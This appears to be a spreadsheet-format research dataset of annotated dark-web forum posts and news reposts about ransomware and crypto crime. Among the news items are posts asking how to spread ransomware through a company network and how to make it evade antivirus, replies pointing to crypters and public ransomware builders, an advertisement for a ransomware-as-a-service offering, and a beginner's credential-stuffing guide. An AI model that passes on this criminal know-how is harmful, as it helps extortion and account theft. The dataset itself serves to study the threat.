coronavirus-infected blood, or this advertisement joins the other host of scams that have erupted with the intention of reaping oblivious victims of their cryptocurrency.;;other coronavirus-related listings;;elsewhere, an ad on own shop, a darknet marketplace, purports that the vendor is a covid-19 patient who has pva for sale which, theoretically may be used by health experts to treat coronavirus patients. the advertisement, which is most likely among the many covid-related scams in the dark web, is asking for $1000.;;other products that have been put up for sale so far include covid-19 test kits, diagnostic tools and even fake coronavirus vaccines.;;in the cybercriminal space, hackers, scammers and state-sponsored groups have moved in to take advantage of the current crisis to use infodemic patterns to attack government machinery and lure people into losing their finances ��� including the forfeiture of sensitive personal data and purchase of fake products.;;;the flipside;;on the other hand, a number of dark web platform admins have been enforcing dignity within their marketplaces. this aspect comes true in the face of directives provided by some of the darknet operators to ban the sale of purported covid-19 remedies.;;a good example can be drawn from monopoly market in which the platform���s admin banned  advertising fake coronavirus vaccines to be sold for bitcoin. this move comes as a sharp contrast to some of the dark web marketplaces that have not stopped the promotion of these medications.;;additionally, the operator for doppelpaymer ransomware has announced that their decision to halt malicious attacks against health institutions during this pandemic. this interesting piece of news reflects a rather unusual dynamic considering the fact that hospitals have always been ideal targets for ransomware groups.;;to conclude, the impact of the covid-19 pandemic on cryptocurrency crime cannot be predicted in the long term given the current circumstances. in the meantime, the dark web and crypto industry will continue to adjust to ramifications of the current coronavirus crisis in a ���one day at a time��</t>
  </si>
  <si>
    <t xml:space="preserve">information post on the effect covid-19 has had on ransomware and the dark web. </t>
  </si>
  <si>
    <t>17/04/2020 14:49</t>
  </si>
  <si>
    <t>9492e6a2da9ba88ecc91</t>
  </si>
  <si>
    <t>Coronavirus-Infected Blood Is up for Sale on the Dark Web</t>
  </si>
  <si>
    <t>i want to install ransomware on a large companies hr station, but i want it to lock all the computers that connect to the hr server, my question is, how do i locate the single key station that is responsible for relaying to all the other stations?;;the ransomware is plug and auto install on a delayed timer and will unpack late at night when nobody is connected to the mainframe.;;just for context, i am relatively new to all this, been in the physical game for a long time and am now moving into digital, any advice is much appreciated and guaranteed to fall on open and intelligent ears.</t>
  </si>
  <si>
    <t>post asking for information on how to locate the key station in a large company to spread ransomware</t>
  </si>
  <si>
    <t>/u/MrMurdoch</t>
  </si>
  <si>
    <t>31/07/2019 06:27</t>
  </si>
  <si>
    <t>db1da37d61828dc14383</t>
  </si>
  <si>
    <t>Corporate Ransomware..?</t>
  </si>
  <si>
    <t>6 days 15:20:00</t>
  </si>
  <si>
    <t>so basically you are a hacker??</t>
  </si>
  <si>
    <t>post questioning whether the original poster is a hacker</t>
  </si>
  <si>
    <t>/u/MoneyGreen23</t>
  </si>
  <si>
    <t>31/07/2019 12:17</t>
  </si>
  <si>
    <t>0 days 05:50:00</t>
  </si>
  <si>
    <t>no need for labels, i will settle for advice on the matter.</t>
  </si>
  <si>
    <t>31/07/2019 21:12</t>
  </si>
  <si>
    <t>0 days 08:55:00</t>
  </si>
  <si>
    <t>;;corporate ransomware..?;;by;/u/mrmurdoch;���;3 years ago;in;/d/fraud;;1 points;���;</t>
  </si>
  <si>
    <t>Post recommending the ransomware the user has created</t>
  </si>
  <si>
    <t>ba968e2e5a6c8bacb384</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the global scope of cyber crime continues to grow, and cyber criminals have discovered that malicious data encryption followed by a ransom demand can be very profitable. many companies admit they often pay the ransom.  ���from financial institutions, government agencies, academic institutions to hospitals, any organization can be the focus of an incident caused by ransomware.���  in addition, the rise of criptocoins remains one of the favorite cyber attacks.;;the best way to protect data and assets is to implement comprehensive cyber security measures that cover everything from infrastructure and storage to mobile networks, all accompanied by the awareness and education of employees.  moreover, it is essential to backup data regularly so the company is not in the position of having to choose between paying the ransom or losing their data.;;in addition, other threats that can���t be overlooked are intentional leaks of information (because of employees or supuntary leakage or weaknesses in security systems.  the institute of internal auditors of costa rica reports that ���the issue of preventing data leakage (pdl), cyber attacks and crimes that use the company���s own tools of communication technology and information (cti) will be analyzed���.;;the association of professionals in informatics and computing, cpic, and the costa rican community information security forces are alerting the national community about the current challenges of the costa rican network against cyber crime.  this relates specifically in connection with the arrest by the oij, and as a result of an investigation by the fbi, of a young student linked to cyber crime activities in the country.  in addition, they called on the government to, within its priorities and as soon as possible, establish stronger telecommunications within the country.  the government has been encouraged to provide the necessary resources and education to the authorities for the defense of costa ricans , children in cyberspace.;;costa rica, unlike what most people think, is a country full of opportunities for hackers��� shelters. the network policy is full of holes that make it ideal for unethical individuals to hide, and from within the country, select their next victims.;;the national network has a value relatively large at the local level because it has the largest banking system in central america and the caribbean, and a more sophisticated technological capacity in many sectors.  it���s represented as a strategic point where thousands of daily connections bounce back to achieve the objectives of greater value to the north of the continent, asia and europe.;;we are a tunnel where the cyber criminal can easily cover their tracks, refuel and change shape, as many drug dealers and other ordinary criminals see costa rica as a bridge.;;certainly they are a leader in the region with regards to internet penetration. as leaders, also in technology and human talent, they have begun to grow in popularvance in the sector. costa rica already has a significant number of individuals with the capacity to cause significant damage to the country and its infrastructure.;;the troubled world of deepweb has an immediate appeal to the younger and inexperienced web users, who in the beginning were called ���script kiddies���.  they can, in a few hours, learn to undermine their neighbor���s wifi and ���sniff out��� banking passwords.  they can easily develop an attack via email ���phishing��� against their teacher and academic institution for the simple fact that they did not get the grades they wanted. the lack of efforts and resources to raise awareness and educate about this technology can result in a very large bill to costa rican society in a very short period.;;this comes as a warning to increase education and awareness efforts in the area of cyber cime in the country. this 24-year old resident of san rafael de heredia was condemned after evidence suggested that he was sta set of networks of software robots, or bots that run autonomously and automatically.  under article 230 in the penal code, he may receive 3-9 years imprisonment. the costa ricans have a right to feel safe, not only on their streets but in the cyber networks as well. everything indicates that the picture only tends to get worse as the years pass and cyber warfare intensifies.;;individuals do not need to have exceptional skills to make bad decisions on the internet, and start the wrong use of these tools.  limiting access to the network and the use of technology is not the solution. it is more effective to model good behavior and ethical action, showing the reality and its possible consequences in the commission of an offense.;;;tips to prevent a cyber attack;;the first thing to consider is to be aware of the uses made of the internet, everything that works well, as well as the risks to which one is exposed. have a secure connection, and try to avoid public wireless networks since anyone can access the data if the connection is not encrypted. for home networks, it is suggested to change the default password provided, use a combination composed of letters and numbers, and change it every so often. it is also recommended to change the name of the wireless network. use different passwords, avoid leaving open sessions, and have an offline backup. log in to secure sites.  those are the ones that begin with the encryption protocol https: //, or that have a padlock icon present in most browsers, confirming that the site is real.;;when in doubt, click the lock and verify that the certificate is reliable. for this, it must say for whom and by whom it was issued, and the effective date thereof. have a reliable antivirus, both on mobile devices and computer equipment. keep your devices updated continually, because new vulnerabilities can put your operating systems at risk.</t>
  </si>
  <si>
    <t>news article on how costa rica has decided to tackle cybercrime</t>
  </si>
  <si>
    <t>18/11/2020 20:33</t>
  </si>
  <si>
    <t>5fb2458d72d781cb7fe2</t>
  </si>
  <si>
    <t>Costa Rica Joins in on The Prevention of Cybercrime</t>
  </si>
  <si>
    <t>i've been trying on my own to code a simple ransomware for a windows computer, but i've hit a wall. what do i need to learn to do this? are there any resources that can help? i'm not looking for books that teach ransomware, but rather books or resources that teach coding techniques that can be used in a malicious way, something like low level os coding books for windows. i've tried reading the msdn documentation, but it doesn't help me too much before hitting a lot of walls.;;also: where can i buy raas? any trustworthy vendors/sites?</t>
  </si>
  <si>
    <t>User asking for learning resorces for ransomware creation</t>
  </si>
  <si>
    <t>/u/vengefulPoltergei5t</t>
  </si>
  <si>
    <t>22/11/2021 01:04</t>
  </si>
  <si>
    <t>be5b714fe24608c7e6e8</t>
  </si>
  <si>
    <t>Creating Simple Ransomware/Where to buy RaaS?</t>
  </si>
  <si>
    <t>3 days 20:18:00</t>
  </si>
  <si>
    <t>man if you want to learn, know each part of a functional ransomware thats ok, try basics hacks first, maybe with ethical hacking courses online, you can find plenty on clearnet.;and only after start programming, learn the languages and use the theorical skills you learned with ethical hacking and other cybersecurity flaws.;;but if your goal is the money, pay someone to do it, your only concern is to be sure he'll not snitch info on you. because this is very risky, you can't do mistake with a bad code or bad opsec because you'll end in jail.</t>
  </si>
  <si>
    <t>User responding recommending ethical hacking courses</t>
  </si>
  <si>
    <t>/u/LIziLIlean</t>
  </si>
  <si>
    <t>25/11/2021 21:22</t>
  </si>
  <si>
    <t>so i see a great deal of interest in the fraud field, and that's great!;unfortunately, i keep seeing people pushing for the wrong information. sure, it's great to have a good method already laid out for you to follow for your cash out, but quite frankly the cash out is fairly easy when you know what you're doing. the community isn't as robust as it used to be as far as vendors with actual, valid, information. those days are well behind us, those with real connections have either moved on to private deals with other established people (ie maze teaming up with other ransomware providers yet never would they start to take in randoms to distribute their software), or they've retired, or they're in jail. that's not to say nobody's still around, and i'm sure plenty of us old timers still lurk around. but anyway, the difficult part isn't the process of cashing out your information - it's actually getting useful information.;;i'm not bashing any shops, vendors, or anyone in the information brokering business, i'm just saying that the easiest way to make sure you succeed is to be self reliant. from there you can plug in others to do some of the more trivial work for a cut in, that's how you realistically scale up. so throughout the next few months i'd like to periodically type up some stuff to help you guys be able to obtain your own information, logs, etc.. to ensure you're never wasting your time on useless shit. if you're already in the information brokering business in more of a middle man type position then i do also encourage you to read this to build on the idea of sourcing your stuff yourself rather than have an overhead or upkeep on the information that goes through however you sell that. if at any point you have a question or want some help with something then my inbox is always open, though i don't spend as much time lurking here as what i once did so you may be better off trying to get at my tg @ oneliferemaining.;;first things first - we're going to want to cover a couple of terms here. i'm assuming you have basic computing experience and at least a semi basic networking and can use some common sense.;glossary:;sentry mba - a program for cracking/credential sutffing;snipr - a similar program for cracking accounts;combolists - large text files with leaked log in credentials that we will fire off at login portals to check validitity.;proxies - a proxy is used to change the ip the attack is from, this prevents ip blacklisting and rate limiting when we're trying hunreds of thousands of log in attempts - it helps us redistribute our traffic and look like legitimate users.;captures - specific information that is collected after a successful log-in - this can be money, account balance, a subscription account, personal information, payment information, etc...;configurations (configs) - these are files to load in to sentry mba that are already set up and fine tuned to work on a specific website - also including capture and other tricks to increase success such as unique browser headers and behavior.;keyworks - these are the responses when we actually cram the ccredentials in a form - keyowrds can be anything such as, invalid credentials, wrong password, welcome, etc... it's just the response that the site is throwibng back when we try to log in, these are keywords because we need to listen for these to determine if a set of credentials actually got us access to the site so we can save those and output them later as a list.;;;;;so let's get to it! we're going to discuss the simplest way to attempt to obtain access to accounts on various platforms - credential stuffiing. you can think of credential stuffing as a brute force attack, except rather than attempting to cram random passwords into the log in form over and over again until it works we're going to use a list (we'll refer to this as a combolist) of emails (or usernames) and passwords. so rather than attempting random guesses we're going to use one single guess, or we'll tweak the credentials from our list a little bit using a password mangler to try a few password combinations for each email.;so i'm sure you're already asking yourself a few questions, and hopefully i'll answer those right now. how are we going to know emails or usernames to try, and what passwords we're going to try with each one? that's where data breaches, data leaks, stuff of this nature are handy. back around 2014 to get lists like this you either had to pay a decent bit of money, run with the right crowd to have them shared (or even be able to purchase them in certain situations), or you needed to dump a sites database yourself. throughout the years so many databases and breaches have been leaked and are out there for anyone to find and download, and week by week the number of those lists that are dumped publicly grow. ransomware providers leak databases when victims don't pay, and this year has been booming with that. so, we're going to use those.</t>
  </si>
  <si>
    <t xml:space="preserve">Post describing credit stuffing (refrencing ransomware) </t>
  </si>
  <si>
    <t>/u/OneLifeRemaining</t>
  </si>
  <si>
    <t>18/06/2020 01:47</t>
  </si>
  <si>
    <t>a21e56eddbac2d2e18a2</t>
  </si>
  <si>
    <t>Credential stuffing for beginners PT 1</t>
  </si>
  <si>
    <t>cryptocurrency investigation firm chainalysis said cryptocurrency-related crime fell significantly in 2020 but remains appealing for criminals due to its anonymous nature. chainalysis reports in 2020, cryptocurrency criminal activity fell to 0.34%, or $10.0 billion in transaction volume, compared with 2019, when criminal activity represented 2.1% of all transaction volume or roughly $21.4 billion worth of transfers. one of the reasons for the decline is due to overall economic activity nearly tripling between 2019 and 2020, but still the overall amount of cryptocurrency-related crime is falling, and is an even smaller part of the cryptocurrency economy, said the firm.;;chainalysis highlighted scams were much smaller in 2020 compared to the enormous plustoken ponzi scheme in 2019, which took in over $2 billion from millions of victims. the majority of the cryptocurrency-related scams, around 54%, were made up of illicit activity followed by darknet markets which was the second-largest crime category, accounting for $1.7 billion worth of activity, up from $1.3 billion in 2019. chainalysis said the ���big story��� for cryptocurrency-based crime in 2020 is the rise of ransomware which, while only accounting for 7% of all funds received by criminal addresses at just under $350 million worth of cryptocurrency, was up 311% from 2019. the number of ransomware incidents could even be higher due to the low reporting rate, the firm said. covid-19 pandemic has forced more people to work-from-home and in turn this has opened up new vulnerabilities to ransomware attacks for many organizations, sa</t>
  </si>
  <si>
    <t xml:space="preserve">Post talking about the trend of crypto-currency related cybercrime (related to ransomware) </t>
  </si>
  <si>
    <t>/u/strawberrypopstickle</t>
  </si>
  <si>
    <t>20/01/2021 05:11</t>
  </si>
  <si>
    <t>/d/FakeMoney</t>
  </si>
  <si>
    <t>7289779b40c7269949b0</t>
  </si>
  <si>
    <t>Criminal Activity In Crypto Transactions Fell Sharply In 2020 Says Chainalysis</t>
  </si>
  <si>
    <t>0 days 10:29:00</t>
  </si>
  <si>
    <t>thank everyone for the responses on redeemer.  i'll use yashma because it doens't have to run as admin right?;;how do i get it past antivirus?  the one time i checked out ransomware there was a crypter for fudd build but yashma doesn't have that?   does anyone have any suggestions?</t>
  </si>
  <si>
    <t>Post asking how to get the yashima ransomware virus past anti-virus security</t>
  </si>
  <si>
    <t>/u/MoveAlong</t>
  </si>
  <si>
    <t>25/05/2022 09:31</t>
  </si>
  <si>
    <t>a8c38cf0fc7482597ca2</t>
  </si>
  <si>
    <t>Crypter or fudd build for Yashma?</t>
  </si>
  <si>
    <t>44 days 21:27:00</t>
  </si>
  <si>
    <t>ransomware uses the run as admin feature because some important functions will only work if they are in an administrator role.;and i think you should test this ransomware's encryption and decryption function on large files, because of this :;- /vinopaljiri/status/1521786404816183296  (twitter);-;/post/ad3676ff3fb47e9b314d;/#c-841d3b46fd8b057897;;how do i get it past antivirus?;- /showthread.php?tid=8517  (;/d/cryptbb;forum)</t>
  </si>
  <si>
    <t>Post providing information on the pirmary post</t>
  </si>
  <si>
    <t>27/05/2022 12:57</t>
  </si>
  <si>
    <t>2 days 03:26:00</t>
  </si>
  <si>
    <t>why would you use this garbage? even if the wiping issue is fixed its still generic msil trash. theres plenty of other free and leaked ransomware builders/source you can fork and rely on rather than this yashma garbage that doesnt even work and when it does its slow and unoptimized.</t>
  </si>
  <si>
    <t>/u/FEDERAL_AGENT</t>
  </si>
  <si>
    <t>0 days 07:10:00</t>
  </si>
  <si>
    <t>name a few...i'm new at this and interested in checking out your point...</t>
  </si>
  <si>
    <t>/u/drkpwn</t>
  </si>
  <si>
    <t>10 days 07:12:00</t>
  </si>
  <si>
    <t>i'm new and a clearnet search showed that there wasn't a free key for it yet.  if you have other suggestions i'd love to hear them.</t>
  </si>
  <si>
    <t>13/06/2022 18:37</t>
  </si>
  <si>
    <t>1 days 13:39:00</t>
  </si>
  <si>
    <t>late but the babuk builder is public, if not very easy to compile. same story with conti.</t>
  </si>
  <si>
    <t>25 days 12:21:00</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a study by blockchain analytics firm chainalysis finds that cryptocurrency-related crime has fallen significantly. the criminal share of all crypto activity fell to just 0.34% in 2020. this contradicts recent statements by u.s. treasury secretary nominee janet yellen and ecb president christine lagarde that cryptocurrencies are mostly used for illicit financing.;;;crypto crime plummeted in 2020;;chainalysis shared some findings from its 2021 crypto crime report this week. while acknowledging that ���cryptocurrency remains appealing for criminals as well due primarily to its pseudonymous nature and the ease with which it allows users to send funds anywhere in the world instantly,��� the blockchain analytics fir"the good news is that cryptocurrency-related crime fell significantly in 2020 ��� in 2020, the criminal share of all cryptocurrency activity fell to just 0.34%, or $10.0 billion in transaction v";;in comparison, the firm explained that in 2019, ���criminal activity represented 2.1% of all cryptocurrency transaction volume, or roughly $21.4 billion worth of transfers.��� last year, ���one reason the percentage of criminal activity fell is because overall economic activity nearly tripled between 2019 and 2020,��� the company noted.;;chainalysis noted that darknet markets were the second-largest crime category. it accounted for $1.7 billion worth of cryptocurrency activity, which was an increase from $1.3 billion in the previous year. ransomware accounted for just 7% of all funds received by criminal addresses, which was just under $350 million worth of cryptocurrency. while small, ransomware saw a 311% jump over 2019.;;the findings by chainalysis contradict the recent statements made by joe biden���s pick for the u.s. treasury secretary, janet yellen, and ecb president christine lagarde. yellen said tuesday that many cryptocurrencies are used ���mainly for illicit filast week that bitcoin ���has conducted some funny business��� and some ���totally reprehensible money laundering activity.���;;several people in the crypto industry have pointed out the error of their statements, including a well-known economist who called lagarde���s statement ���outrageous.��� he emphasized, ���we all know that the vast majority of money laundering globally is conducted in fiat curren</t>
  </si>
  <si>
    <t>Post dicussing the decrease in crypto-cyber crime in comparision to ransomware, which is risen dramatically</t>
  </si>
  <si>
    <t>27/01/2021 21:52</t>
  </si>
  <si>
    <t>0169ea9fea91e6a3f49d</t>
  </si>
  <si>
    <t>Crypto Crime Fell Sharply to Only 0.3% of All Cryptocurrency Activity in 2020</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;the proceeds of crypto crime fell by more than $5 billion in 2020, due to increasing regulatory compliance by crypto exchanges and declining scams. revenue from crypto-related crime dropped by more than half in 2020 according to chainalysis��� annual report on the subject.;;cybercriminals netted around $5 billion less than the $10 billion plus they got away with in 2019, representing a 53% fall. transactions involving illicit funds have decreased even more rapidly than the total volume of those funds, falling from 2.1% of all transactions analyzed in 2019 down to just 0.34% last year.;;among the eight categories of transactions deemed ���illicit��� by chainalysis, the dollar amount of crypto taken in by scams decreased the most, by 71% to $2.6b, largely due to the fact that 2019���s multi-billion dollar plustoken scandal dwarfed anything seen in 2020 so far.;;overall crypto crime volume ��� including the proceeds of crime and the attempts to lau0b in 2019 to around $10b last year. but it���s not all good news and possibly the most alarming part of the report is the finding that ransomware-related theft rose 311% from 2019 to 2020, representing an additional loss of more than $250 million in 2020 compared to 2019.;;even with a year-over-year increase in ransomware and darknet market activity, chainalysis says the outlook on crypto crime ���has never been better,��� thanks to recent advancements in regulatory and compliance processes. ���the good news is three-fold: cryptocurrency-related crime is falling, it remains a small part of the overall cryptocurrency economy, and it is comparatively smaller to the amount of illicit funds involved in traditional finance.���;;chainalysis��� conclusions broadly echo those put forth in a recent report by security firm ciphertrace, which found that crypto-related crime dropped by 57% in 2020. according to chainalysis, the big rise in ransomware is due to the introduction of �u victims,��� which, when combined with pre-existing ransomware strains, accounted for nearly $350 million of cryptocurrency theft in 2020.;;although the origins of ransomware attacks may seem disparate and random, chainalysis believes that the infrastructure attackers need to launder crypto into cash ���may be controlled by just a few key players,��� similar to the origins of the ransomware itself. chainalysis also notes that the increasing collection of personal identifying information from exchanges has effectively forced criminals to ���rely on a surprisingly small group of service providers��� to exchange ill-gotten crypto holdings into fiat.;;���in the long run, (compliance) efforts by exchanges will also remove some of the incentive to use cryptocurrency in criminal activity, as it will become much harder for cyber criminals to convert cryptocurrency into cash if they can���t use exchanges.��� last month, the department of justice announced it had confisca operator; the bust being the result of a collaboration with chainalysis.</t>
  </si>
  <si>
    <t>24/02/2021 15:08</t>
  </si>
  <si>
    <t>6a42def4e23b910379cc</t>
  </si>
  <si>
    <t>Crypto Criminals Got Away With $5B Less in 2020 as Scam Revenue Falls</t>
  </si>
  <si>
    <t>;cryptonite ��� ransomware as a service;;we have launched our website with our new ransomware cryptonite just 1 month ago and we already have over 500 users!;try our free preview at;http://cryptondzygkalfc.onion/;;;we have chosen to offer the ransomware as a raas (ransomware as a service) package to make our ransomware easily customizable for everyone and keep the source-code private. we have no fees, but an entirely new system where you receive the ransom payments directly into your own cryptocurrency wallet.;;we have tried to combine the best functions of our previous ransomware distributions to one easy to customize package, and taken all your feedback into account as well. you asked, we delivered.;;;easily deploy high-end ransomware with just basic computer knowledge trough our user interface.;no fees, no coding skills required, fully undetectable, unique encryption keys, time-sensitive ransom amount, network infection &amp; advanced tracking.;;;no ransom fees;you enter your own wallet address, and the  amount is send directly to your address by the infected person.;;;fully undetectable;cryptonite is 100% fud (fully undetectable), which means that it bypasses every anti-virus, anti-malware and firewall program.;;;unique encryption keys;our ransomware creates an unique encryption key for each infection, thus making it impossible to decrypt files with compromised encryption keys.;;;no coding skills needed;cryptonite ransomware is easily customizable. set your ransom amount, deployment-period or choose one of the file extensions.;;;increasing ransom;our ransomware supports setting a time-sensitive ransom amount, to put more pressure on making a payment every second.;;;disable windows system restore;let cryptonite disable windows system restore upon infection to make it impossible to revert to a previous back-up.;;;lots of other functions;upload custom files to infect them with ransomware, keep track of your infections trough advanced tracking and you still haven���t discovered all of cryptonite���s;;discover all of crypnite's functions at http://cryptondzygkalfc.onion/.;;dont miss out on our sale! be quick and profit of our deal for the first 1.000 users.;;- the cryponite team</t>
  </si>
  <si>
    <t>Post advertising new raas cryptonite</t>
  </si>
  <si>
    <t>raas provider (group) / hacker (group)</t>
  </si>
  <si>
    <t>/u/CryptoniteRaas</t>
  </si>
  <si>
    <t>27/11/2019 16:43</t>
  </si>
  <si>
    <t>4904e774b6e8b0d9788a</t>
  </si>
  <si>
    <t>Cryptonite - Ransomware as a Service</t>
  </si>
  <si>
    <t>0 days 09:40:00</t>
  </si>
  <si>
    <t>{'ransomware': 9, 'raas': 1}</t>
  </si>
  <si>
    <t>how do you keep your files undetected? what language is the crypter coded in?;interesting.</t>
  </si>
  <si>
    <t xml:space="preserve">Post requesting how the cryptonite ransomware is completely undetectable as they claimed  </t>
  </si>
  <si>
    <t>/u/Denode</t>
  </si>
  <si>
    <t>27/11/2019 16:53</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;organizations across the world are now beginning to realize that traditional security measures are largely ineffective against the current generation of increasingly sophisticated ransomware attacks.;;source: scmagazine;;the recent darkside assault on colonial pipeline, the avaddon breach of axa insurance and the alleged conti attack recently used to attack the irish healthcare system are all evidence of the professionalism of the ransomware industry. in 2020, for example, the average ransom payment increased by 171% to $312,493, according to palo alto networks. highly organized ransomware gangs such as revil and clop, a gang whose recent victims include shell and stanford university, are now behaving like regular corporations by running high-level recruitment drives and issuing press releases to establish online credibility for their organizations. their strategy is to establish a reputation for reliability among potential victims to reassure target organizations that once a ransom has been paid the criminal gang will release the necessary encryption to get the system up and running again, even providing them with any necessary support services.;;ransomware attacks themselves have also become more sophisticated and harder to detect as threat actors now have an increasingly wide choice of attack vectors to choose from, such as the rapid growth in the number of iot devices. to protect themselves against a constant onslaught from organized ransomware gangs, organizations ideally require intelligence in the form of prior warning of the most serious incoming attacks.;;effective threat intelligence now includes extensive use of ai to provide consistently updated threat feeds using malware analysis tools to help identify relevant threats automatically, together with automated patch prioritization recommendations that assist engineers in deciding which threats pose the greatest risk. this can help identify crucial information such as the exact build of the customized ransomware being used to attack the organizations targeted, which the attacks can reverse engineer to discover the encryption key and retrieve the stolen data.;;business continuity and disaster recovery planning can also help organizations prepare for a ransomware worst-case scenario by providing the ability to successfully restore data and recover from an attack. monitoring of dark web publishing sites for different ransomware families also lets organizations download the sample exfiltrated data they publish to search it and understand exactly which organizations have been exposed, including business partners and clients.;;ransomware gangs can now buy from an increasingly wide range of malware available in dark web forums and frequently order ransomware designed for a unique attack on a specific target. as not all threats affect all organizations in the same way, threat intelligence needs to be customized to focus on the categories of threats most relevant to a particular organization. security pros also base this on considerations such as the build of its it environments, which are often situated on the organization���s premises or on the cloud. security teams can also determine the potential danger of any threat by the types of workload used by the organization together with other considerations, including industry-specific compliance.;;the threat landscape has become so varied and complex that data visualization tools of incoming threat intelligence are also essential to navigate it successfully, which lets engineers spot relevant trends within threat data and  assess the potential severity of different threats.;;effective threat intelligence also needs to show how and where specific threats have originated and how they are evolving. to discover the severity of an attack, security teams need to discover exactly who���s behind specific threats and what their motives are, as individual threat actors can range from script kiddies to nation-states.;;while it���s not always possible to apprehend the criminals respomware attack physically, as many reside in regions outside united states. nevertheless, knowing the identity and motivation of an attacker can help security teams construct appropriate defenses and tracking the threat actors��� moves to counter their strategies and mitigate any potential damage.;;organizations and their consultants must work closely together to gather effective threat intelligence to defend themselves against what are becoming increasingly professional and ambitious ransomware attacks. effective threat intelligence gathering that includes monitoring of the darkest recesses of the deep web and the dark web lets organizations take the fight directly to the cyber criminals. standard security protocols and defenses constructed to prevent known attack vectors are no longer sufficient. to deliver effective security requires threat intelligence tools that are truly intell</t>
  </si>
  <si>
    <t xml:space="preserve">Post discussing how unprepared traditional security measures are unprepared against the current generation of ransomware attacks </t>
  </si>
  <si>
    <t>64de41b2da63e0b6bd7e</t>
  </si>
  <si>
    <t>Customized Threat Intelligence Can Track Down Ransomware Gangs</t>
  </si>
  <si>
    <t>{'darkside': 1, 'avaddon': 1, 'revil': 1, 'ransomware': 10}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;researchers find a million compromised corporate accounts of game companies on underground forums, and warn that the industry is a lucrative target for malicious hackers. nearly one million compromised accounts providing internal access to video game companies are up for sale on dark web forums as cyber criminals increasingly turn towards the online-gaming industry as a high-value target, a security company has claimed.;;the online-gaming industry is set to reach almost $200 billion in revenue by 2022. but despite this, some areas of the industry still aren't prioritising security ��� and that could put organisations and their customers at risk from hackers. cybersecurity company kela examined underground forums and found an ecosystem based around buying and selling initial network access to gaming companies, as well as almost one million compromised accounts of gaming employees and clients up for sale ��� with half of those being listed in 2020 alone.;;compromisls up for sale ��� often only for just a few dollars ��� include usernames and passwords for all manner of business resources used by employees throughout gaming companies, including admin panels, vpns, developer environments, client facing resources and more.;;but in some cases, cyber criminals don't even need to scour underground forums for adverts selling compromised accounts ��� researchers say there are 500,000 leaked credentials available for free as a result of previous data breaches. these include what the com"high-profile email addresses such as senior employees and email addresses that are generally a significant channel in the company" including finance, hr and it support.;;with this sort of information in their hands, cyber attackers could gain access to the wider network ��� or even the networks of other businesses that form part of the compromised target's supply chain. these could be attacks designed to harvest additional credentials for additional exploitation or it's even possible that the compromised credentials could be used to deploy ransomware on the network.;;online gaming can be a lucrative business and cyber criminals know this which is why there's been an increase in underground activity looking to target these businesses, with users either selling or asking for access to online-gaming companies around the world to varying degrees.;;in once instance, researchers messaged a seller who was offering access to the cloud storage"major game developer" ��� and the sellers offered access to that resource, as well"major japanese game developer", suggesting that some of the hackers in this space have much wider access to compromised companies than first thought.;;"as we've all been observing ��� attacks and attackers are becoming more sophisticated and customized to the victim. some attackers try to search for the specific data and information that is relevant to the scope or industry of the victim and reproduce the successful at" researchers said.;;in order to help prevent online-gaming companies having credentials stolen or falling victim to other cyberattacks, it's recommended that they implement unique passwords for employees ��� so that they're not using the same passwords in two places, meaning that if they can be identified in another breach, the password won't work with their corporate account.;;it's also recommended that organisations apply multi-factor authentication policies across the business, so if cyber criminals do gain access to corporate login credentials, it's much harder for them to gain access to the network and to move arou</t>
  </si>
  <si>
    <t>Posts discussing cyber criminals taking advantages of insecure game forums/accounts and how to prevent against this (ransomware related)</t>
  </si>
  <si>
    <t>9b6185b207426b3c9753</t>
  </si>
  <si>
    <t>Cyber Criminals Are Taking Aim at Online Gaming for Their Next Big Pay Day</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;ransomware is the buzzword every time businesses discuss cyberthreats they are likely to face in 2021. to help companies understand how the ransomware ecosystem operates and how to fight it, the latest report by it security firm kaspersky researchers dug into darknet forums, took a deep look at revil and babuk gangs and beyond and debunked some of the myths about ransomware.;;;source:;the financial express / msn;;like any industry, the ransomware ecosystem comprises many players that take on various roles. contrary to the belief that ransomware gangs are actually gangs-tight, have been through it all together, godfather-style groups, the reality is more akin to the world of guy ritchie's the gentlemen, with a significant number of different actors-developers, botmasters, access sellers, ransomware operators-involved in most attacks, supplying services to each other through dark web marketplaces.;;these actors meet on specialised darknet forums where one can find regularly updated ads offering services and partnerships. prominent big-game players that operate on their own do not frequent such sites. however, well-known groups such as revil that have increasingly targeted organisations in the past few quarters, publicise their offers and news on a regular basis using affiliate programs. this type of involvement presumes a partnership between the ransomware group operator and the affiliate with the ransomware operator taking a profit share of 20-40%, while 60-80% stays with the affiliate.;;as the people who infect companies and the ones who actually operate ransomware are different groups, only formed by the desire to profit, the companies infected most are often low hanging fruit-essentially, the ones that the attackers were able to gain easier access to. these attackers, more often than not, are botnet owners who work on massive and wide-reaching campaigns and sell access to the victim machines in bulk, and access sellers on the lookout for publicly disclosed vulnerabilities in internet facing software, such as vpn appliances or email gateways, which they can use to infiltrate companies.;;"the ransomware ecosystem is a complex one with many interests at stake. it is a fluid market with many players, some quite opportunistic, some very professional and advanced. they do not pick specific targets, they may go after any organisation-an enterprise or a small business, as long as they can gain access to them. moreover, their business is flourishing, it is not going away anytime soon," says dmitry galov, security researcher at kaspersky's global research and analysis team. "the good news is even rather simple security measures can drive the attackers away from organisations, so standard practices such as regular software updates and isolated backups do help."</t>
  </si>
  <si>
    <t>Post describing kaspasky's deep dive into ransomware groups and their findings</t>
  </si>
  <si>
    <t>7ba445b848209236e73b</t>
  </si>
  <si>
    <t>Cyber Gangs: Ransomware Operators and Where to Find Them</t>
  </si>
  <si>
    <t>{'revil': 2, 'ransomware': 8}</t>
  </si>
  <si>
